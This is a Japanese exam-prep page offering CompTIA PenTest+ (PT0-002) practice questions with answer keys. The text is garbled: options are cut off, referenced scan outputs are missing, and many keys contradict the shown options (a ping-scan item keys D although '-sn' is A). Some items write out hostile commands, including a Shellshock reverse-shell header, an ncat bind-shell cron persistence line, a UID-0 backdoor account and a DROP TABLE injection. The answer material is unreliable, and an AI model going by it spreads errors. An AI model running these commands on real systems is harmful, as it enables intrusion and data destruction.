すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CompTIA PT0-002模擬試験と実際の試験のシミュレーション、CompTIA PenTest+認定資格|SPOTO

弊社のCompTIA PT0-002練習問題集を利用してCompTIA PenTest+(PT0-002)認定試験に合格する準備をしましょう。試験の準備をする最もよい方法は最新の試験問題集を使って練習することです。弊社のCompTIA PT0-002模擬試験と実際の試験シミュレーションはあなたに総合的でリアルな受験体験を提供します。CompTIA PenTest+認定資格は、侵入テストや脆弱性管理を担当するサイバーセキュリティのプロフェッショナルに最適です。模擬試験、サンプル問題、試験ダンプ、試験問題と解答を利用することで、試験当日にスキルと知識を発揮するための十分な準備が整います。当社の模擬試験と試験シミュレータは、実際の試験状況をシミュレートすることで、あなたの準備をさらに強化します。弊社の試験問題集を利用して、PT0-002試験に対するあなたの理解と準備を強化しましょう。弊社の試験準備資料で自信を持って準備をして成功しましょう。
他のオンライン試験を受ける

質問 #1
ある侵入テスト実施者が、MITRE ATT&CK フレームワークをある企業の法律顧問に説明しています。次のうち、テスターがフレームワークの利点として最も説明しそうなものはどれですか?
A. セキュリティ侵入の手口を理解することで、侵入を阻止することができます。
B. フレームワークの一部であるスクリプトは、SIEMツールに直接インポートできる。C
回答を見る
正解: D
質問 #2
Nmapスキャンの結果は以下の通り:Nmap 7.80 ( https://nmap.org ) at 2021-01-24 01:10 EST ( 10.2.1.22 ) ホストのNmapスキャンレポートがアップしました(待ち時間0.0102秒)。表示されていません:998 フィルタリングされたポート ポート状態 サービス 80/tcp open http |_http-title: 80F 22% RH 1009.1MB (text/html) |_http-slowloris-check:| VULNERABLE:| デバイスタイプ: ブリッジ|汎用 起動中 (推測) :QEMU (95%) OS CPE: cpe:/a:qemu:qemu ホストに完全に一致する OS は見つかりませんでした (テスト条件は理想的ではありません)。
B. 一般向けWebサーバー C
E. 露出したRDP
F. プリントキュー
回答を見る
正解: D
質問 #3
ある最高情報セキュリティ責任者は、侵入テスト実施者に会社の従業員のセキュリティ意識レベルを評価させたいと考えています。テスト者がこの目標を達成するために役立つツールは、次のうちどれですか?
A. Metasploit B
回答を見る
正解: B
質問 #4
ある侵入テスト実施者が、ウェブアプリケーションを手動で評価しているときに、次の有効な URL を発見しました: http://www.example.com/product.php?id=123987。次の自動化ツールのうち、NEXT を使用してこの URL の脆弱性を特定するのに最適なものはどれですか?
A. SQLmap
B. ネサス C
回答を見る
正解: B
質問 #5
ペネトレーションテストの実施中、あるコンサルタントがフィッシングキャンペーンの潜在的な標的を特定するため、クライアントの偵察を行った。次のうちどれを使えば、コンサルタントはクライアントのサイバーセキュリティツールを起動することなく、技術連絡先と請求連絡先の電子メールアドレスを迅速に取得できるでしょうか?(2つ選びなさい)
A. ソーシャルメディア・サイトのスクレイピング
B. WHOISルックアップツールを使用する C
E. DNSルックアップツールの活用
F. 顧客施設付近での区間運転の実施
回答を見る
正解: C
質問 #6
侵入テスト担当者が、ファイル所有者によるシェルスクリプトの実行を許可するコマンドはどれか。
A. chmod u+x script
B. chmod u+e script
回答を見る
正解: BD
質問 #7
ある侵入テスト実施者は、サーバーから MD5 ハッシュを収集し、レインボーテーブルを使ってそのハッシュを簡単にクラックすることができました。次のうち、是正報告書に推奨事項として含めるべきものはどれか。
A. より強力なアルゴリズム要件
B. サーバーのアクセス制御 C
回答を見る
正解: B
質問 #8
ある企業は、クラウド・サービス・プロバイダーが、自社のソフトウェア開発を格納するVMを適切に保護していないことを懸念している。VMは、物理リソースを共有する他の企業とともにデータセンターに収容されています。次の攻撃タイプのうち、同社が最も懸念しているのはどれですか?
A. データフラッディング
B. セッション・ライディング C
回答を見る
正解: B
質問 #9
ある企業のセキュリティ慣行を物理的に評価している侵入テスト実施者が、その企業がオフィスビル内にシュレッダーを設置していないことに気づきました。機密情報を入手するために使用する技術として、次のうちどれがベストでしょうか?
A. バッジクローン
B. ダンプスター・ダイビング C
回答を見る
正解: A
質問 #10
ある侵入テスト実施者が、10.10.1.1 にある脆弱なウェブサーバを発見した。テスト者は次に、Webエクスプロイトを送信するPythonスクリプトを編集し、次のコードに出くわします:"() { ignored;};/bin/bash -i>& /dev/ tcp/127.0.0.1/9090 0>&1", "Accept":「text/html,application/xhtml+xml,application/xml"}。サーバーが実行されているユーザーコンテキストを決定するために、テスターがスクリプトに加えるべき編集は、次のうちどれですか?
A. exploits = {"User-Agent":"() { 無視される;};/bin/bash -i id;whoami", "Accept":「text/html,application/xhtml+xml,application/xml"}。
B. exploits = {"User-Agent":"() { 無視される;};/bin/bash -i>& find / -perm -4000", "Accept":text/html,application/xhtml+xml,application/xml"}」。C
回答を見る
正解: C
質問 #11
ある侵入テスト実施者が、業務で使用する認証情報を探すために .pcap ファイルを受け取りました。テスト者が .pcap ファイルを開いて読むために利用すべきツールはどれですか。
A. Nmap B
回答を見る
正解: C
質問 #12
ある企業が、ネットワーク上に不正なアクセスポイントを展開し、設定するために、侵入テスト担当者を雇いました。この目的を達成するために使用するツールとして、最も適切なものはどれか。A.Wireshark B.Aircrack-ng C.Kismet D.Wifite
ある企業が、ネットワーク上に不正なアクセスポイントを展開し、設定するために、侵入テスト担当者を雇いました。この目的を達成するために使用するツールとして、最も適切なものはどれか。A. Wireshark B
回答を見る
正解: B
質問 #13
攻撃者が使用する一般的な戦術とテクニックのマトリックスと推奨される緩和策を提供しているのは、次のうちどれですか?A.NIST SP 800-53 B.OWASP Top 10 C.MITRE ATT&CKフレームワーク D.PTES 技術ガイドライン
攻撃者が使用する一般的な戦術とテクニックのマトリックスと推奨される緩和策を提供しているのは、次のうちどれですか?A. NIST SP 800-53 B
回答を見る
正解: C
質問 #14
ある侵入テスト実施者が、モバイルクライアントのラップトップ上のWindowsワークステーションにアクセスすることに成功しました。テスト者がシステムへのアクセスを維持できるようにするには、次のうちどれを使用すればよいですか。A.schtasks /create /sc /ONSTART /tr C: \TempWindowsUpdate.exe B.wmic startup get caption,command C.crontab -l; echo "@reboot sleep 200 && ncat -lvp 4242 -e /bin/bash")| crontab 2>/dev/null D.sudo useradd -ou 0 -g 0 user
ある侵入テスト実施者が、モバイルクライアントのラップトップ上のWindowsワークステーションにアクセスすることに成功しました。テスト者がシステムへのアクセスを維持できるようにするには、次のうちどれを使用すればよいですか。A. schtasks /create /sc /ONSTART /tr C: \TempWindowsUpdate
回答を見る
正解: C
質問 #15
IoT デバイスのベンダー情報やその他のセキュリティ関連情報を収集し、パッシブ偵察に役立てるのに最も有用なツールはどれか。
A. 初段
B. Nmap C
回答を見る
正解: D
質問 #16
Nmapスキャンの結果は以下の通りである:このデバイスに関する最良の結論はどれか。
A. このデバイスは、TCP/22 上のトランザクションがハートビート拡張パケットを処理する方法に起因する Heartbleed バグの脆弱性があり、攻撃者がプロセスメモリから機密情報を取得できる可能性があります。
B. このデバイスは、インバンド管理サービスを持つゲートウェイである可能性が高い。C
回答を見る
正解: C
質問 #17
HOTSPOT あなたは、ウェブサーバの堅牢化を任されたセキュリティアナリストです。悪意のある HTTP ペイロードのリストを渡されました。以下の攻撃シグネチャが与えられた場合、攻撃のタイプを決定し、今後その攻撃を防ぐための関連する修正策を特定する。シミュレーションの初期状態に戻したい場合は、[Reset All]ボタンをクリックしてください。
A.
回答を見る
正解: D
質問 #18
あるセキュリティ会社が、個人情報と給与データが保管されている人事サーバーへのアクセスを試みるため、内部脅威の範囲を絞ったアセスメントの実施を請け負った。
A. 侵入テスト担当者は内部ネットワークの開始位置を与えられています。次の行為のうち、実行された場合、評価の範囲内で倫理的となるのはどれか。
A. SQLデータベースの設定の弱点を突く
B. アウトバウンドTLSトラフィックを傍受する C
E. ドメインコントローラの永続性の確立と維持
回答を見る
正解: A
質問 #19
侵入テスト実施者は、あるインターフェイス上の未知のIPレンジを持つネットワーク・デバイスにアクセスした。さらに調査を進めると、これはサードパーティサプライヤへの常時接続 VPN トンネルであることが判明しました。侵入テスト担当者が取るべき行動として最も適切なものはどれか。
A. トンネルを他の内部装置への旋回手段として利用する。
B. IP範囲は範囲外なので無視する。C
回答を見る
正解: B
質問 #20
ある侵入テスト実施者がアセスメントを開始しようとしているが、対象企業に関する公開情報しか持っていない。クライアントはこの演習を知っており、テストの準備をしています。次のうち、アセスメントの範囲を表すものはどれですか?
A. 一部既知の環境テスト
B. 既知の環境テスト C
回答を見る
正解: A
質問 #21
ある侵入テスト者が、サブネット上の生きているホストを迅速に発見しようとしている。次のコマンドのどれがpingスキャンを実行しますか。A.nmap -sn 10.12.1.0/24 B.nmap -sV -A 10.12.1.0/24 C.nmap -Pn 10.12.1.0/24 D.nmap -sT -p- 10.12.1.0/24
ある侵入テスト者が、サブネット上の生きているホストを迅速に発見しようとしている。次のコマンドのどれがpingスキャンを実行しますか。A. nmap -sn 10
回答を見る
正解: D
質問 #22
自動車業界向けに組込みソフトウエアを開発する会社が、納品前の製品のセキュ リティを評価するため、侵入テスト・チームを雇った。ペネトレーションテストチームは、概念実証のエクスプロイトを開発するためにバイナリを分析できるリバースエンジニアリングチームに下請けする意向を表明している。ソフトウェア会社は、下請け契約の承認に先立って、リバースエンジニアリングチームの追加的な身元調査を要求している。以下の懸念事項のうち、どれに該当するでしょうか?
A. リバースエンジニアリングチームは、第三者にエクスプロイトを販売した過去があるかもしれない。
B. リバースエンジニアリングチームは、その分析にクローズドソースまたはその他の非公開情報フィードを使用することができる。C
回答を見る
正解: A
質問 #23
ある侵入テスト者が社内のウェブ・サーバをブルートフォースし、次のような出力を生成するコマンドを実行した:しかし、侵入テスト者がURL http://172.16.100.10:3000/profile をブラウズしようとすると、空白のページが表示された。次のうち、出力がない最も可能性の高い理由はどれですか?
A. ファイアウォールでHTTPポートが開いていない。
B. テスターがコマンドの前にsudoを実行していない。C
回答を見る
正解: A
質問 #24
次の行番号のPythonコードスニペットが偵察に使用されています:このスクリプトの次の行番号のうち、このスクリプトが組織の IDS の「ポートスキャンの可能性が高い」アラートをトリガーした可能性が最も高いのはどれですか?
A. 01行目
B. 02行目 C
回答を見る
正解: C
質問 #25
クライアントが侵入テストチームと教訓を得るためのミーティングを開催する理由を最もよく表しているのは、次のうちどれか。
A. 報告書の構成に関するフィードバックを提供し、改善を勧告すること。
B. 調査結果について議論し、誤検知に異議を唱える C
回答を見る
正解: B
質問 #26
ある侵入テスト実施者が、顧客の建物内の安全な部屋にアクセスするための物理的な侵入テストを実施するために雇われた。外部偵察は、2つの入口、WiFiゲストネットワーク、インターネットに接続された複数のセキュリティカメラを特定します。次のツールまたはテクニックのうち、追加の偵察をサポートするベストはどれですか?
A. ウォードライビング
B. 初段 C
回答を見る
正解: A
質問 #27
ある企業が、クラウドサービスプロバイダーから脆弱性スキャンの許可を得たので、ホストされているデータのセキュリティをテストしたいと考えている。このリスクを評価するために、テスターが最初に確認すべきことはどれか。
A. 顧客の機密データが一般に公開されているかどうか。
B. クラウドとクライアント間の接続が安全かどうか C
回答を見る
正解: AC
質問 #28
ある侵入テスト実施者が、Windowsサーバー上で次のコマンドを実行した:最終報告書を提出した後、テスターが行うべきことはどれか。
A. スケジュールされたバッチジョブを削除する。
B. リバースシェル接続を閉じる。C
回答を見る
正解: B
質問 #29
ある会社の最高経営責任者が、セカンダリー・ホーム・オフィスを設立し、使用されているWiFiサービスが攻撃に対して脆弱であることを懸念している。侵入テスターがWiFiのルーターのセキュリティをテストするために雇われている。次のうち、ブルートフォース攻撃に対して最も脆弱なものはどれか。a.wps b.wpa2-eap c.wpa-tkip d.wpa2-psk
ある会社の最高経営責任者が、セカンダリー・ホーム・オフィスを設立し、使用されているWiFiサービスが攻撃に対して脆弱であることを懸念している。侵入テスターがWiFiのルーターのセキュリティをテストするために雇われている。次のうち、ブルートフォース攻撃に対して最も脆弱なものはどれか。a. ps b
回答を見る
正解: A
質問 #30
ある侵入テスト者は、顧客の金融システムにアクセスするために8営業時間を与えられています。成功の可能性が最も高いのは、次のどのテクニックでしょうか?
A. 顧客の職場に入る従業員を尾行しようとすること。
B. 会社のロゴが入った悪意のあるUSBキーを駐車場に落とす C
回答を見る
正解: B
質問 #31
ある侵入テスト実施者が、顧客の重要なサーバーに対して脆弱性スキャンを実施したところ、以下のことが判明しました:次のうち、是正を推奨するものはどれか。
A. ユーザー・トレーニング・プログラムの導入
B. C
回答を見る
正解: C
質問 #32
Nmapスキャンは、ウェブサーバとデータベースのオープンポートを示す。侵入テスト者は、これらのシステムに関する脆弱性と追加情報を特定するために、WPScanとSQLmapを実行することにしました。侵入テスト担当者が達成しようとしているのは次のうちどれですか。
A. 収集した証拠に基づき、潜在的な犯罪行為を発見する。
B. 環境内のすべての脆弱性を特定する。C
回答を見る
正解: A
質問 #33
インターネットに直接接続されたIoTデバイスに関連する最も一般的な脆弱性はどれか?
A. サポートされていないオペレーティングシステム
B. DDoS攻撃を受けやすい C
回答を見る
正解: A
質問 #34
侵入テスト実施者がターゲットに対してNmapスキャンを実施し、以下の結果を受け取った:ターゲット上でTCPポート1080を使用するスキャンツールをリダイレクトするために、テスト者は次のうちどれを使用すべきか?
A. ネサス
B. ProxyChains C
回答を見る
正解: D
質問 #35
ある大手クライアントが、侵入テスト実施者に、インターネットに面したネットワーク内のデバ イスをスキャンしてほしいと望んでいる。このクライアントは、特に認証要件のない Cisco デバイスを探しています。Shodan の次の設定のうち、クライアントの要件を満たすものはどれですか?
A. 「cisco-ios" "admin+1234"
B. 「cisco-ios" "no-password" C
回答を見る
正解: D
質問 #36
ある侵入テスト実施者が、クライアントとサーバ間の NTLM チャレンジレスポンスのトラフィックをキャプチャすることができた。サーバにアクセスするために、この pcap を使用できるのは次のうちどれでしょうか?
A. 垂直的な特権昇格を実行する。
B. キャプチャしたトラフィックをサーバーにリプレイし、セッションを再現する。C
回答を見る
正解: C
質問 #37
侵入テスト実施者が、侵入したWindowsサーバー上でsdelete mimikatz.というコマンドを実行する理由を説明したものはどれか。 * を実行する理由を説明するものはどれか。
A. ハッシュをクラックするレジストリエントリを削除するには
B. テスターが作成したMimikatzアカウントを削除する C
回答を見る
正解: C
質問 #38
ある新しいクライアントが、そのクライアントの新しいサービスに対する様々なセキュリ ティ評価のために、ペネトレーションテスト会社を1か月の契約で雇った。顧客は、アセスメントが完了した後すぐに新サービスを一般に公開する予定であり、重大な問題を除く発見事項は、サービスが公開された後に修正する予定である。クライアントはシンプルなレポート構造を希望しており、毎日調査結果を受け取ることを望んでいません。次のうち、侵入テスト実施者にとって最も重要なものはどれですか?
A. クライアントが要求するフォーマットを確立する。
B. 顧客に直ちにエスカレーションするリスクの閾値を設定する。C
回答を見る
正解: B
質問 #39
ある侵入テスト実施者がウェブサーバのアセスメントを実施した。このセッションのログを見ると、次のようになっています。http://www.thecompanydomain.com/servicestatus.php?serviceID=892&serviceID=892 ' ; DROP TABLE SERVICES; -- 次の攻撃のうち、どれが試みられていますか。A.クリックジャッキング
B. セッションハイジャック C
回答を見る
正解: B
質問 #40
コンプライアンス・ベースのペネトレーション・テストは、主に次のような点を重視する:
A. 保護されたネットワークからPllを取得する。
B. エッジデバイスの保護をバイパスする。C
回答を見る
正解: C
質問 #41
あるコンサルティング会社がスコーピング中にROEを完成させようとしている。ROEに含めるべきものはどれか?
A. 評価費用
B. 報告書の配布 C
回答を見る
正解: A
質問 #42
ある侵入テスト実施者に、192.168.1.0/24 範囲の一連のターゲットを攻撃し、できるだけ少ないアラームと対策を発動させるという任務が与えられました。次のNmapスキャン構文のうち、この目的を達成するのに最適なものはどれか。
A. nmap -sT -vvv -O 192
B. nmap -sV 192
回答を見る
正解: A
質問 #43
ある企業が、従業員に対するソーシャル・エンジニアリング・テストを実施するため、ペネトレーション・テスターを雇った。テスターはその会社のウェブサイトで従業員の電話番号を見つけられなかったが、数カ月前に電話番号の完全なカタログが公開されたことを知った。ペネトレーション・テスターが従業員の電話番号を最初に探すべき場所はどれか。
A. ウェブアーカイブ B
回答を見る
正解: A
質問 #44
あるソフトウェア会社が、データベース・サーバーへの侵入テストを行うために、侵入テス ターを雇った。テスターには、会社の個人情報保護方針で使用される様々なツールが与えられています。このサーバーの脆弱性を見つけるために使用するのに最も適しているのは、次のうちどれでしょうか。A.OpenVAS B.Nikto C.SQLmap D.Nessus
あるソフトウェア会社が、データベース・サーバーへの侵入テストを行うために、侵入テス ターを雇った。テスターには、会社の個人情報保護方針で使用される様々なツールが与えられています。このサーバーの脆弱性を見つけるために使用するのに最も適しているのは、次のうちどれでしょうか。A. OpenVAS B
回答を見る
正解: A
質問 #45
シミュレーション あなたは侵入テスト実施者で、サーバーのポートスキャンを実施している。指示 パート 1:出力が与えられたら、利用可能なオプションから、この出力を生成するために使用されたコマンドを構築しなさい。パート2:コマンドが適切に構築されたら、与えられた出力を使用して、さらに調査すべき潜在的な攻撃ベク ターを特定しなさい。シミュレーションの初期状態に戻したい場合は、Reset All ボタンをクリックしてください。
A. 以下の説明を参照。
回答を見る
正解: C
質問 #46
ユーザーがログインした後、HTTPプロトコルの状態を制御するために、侵入テスト担当者が攻撃すべきはどれか。
A. HTTPS通信
B. 公開鍵と秘密鍵 C
回答を見る
正解: A

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: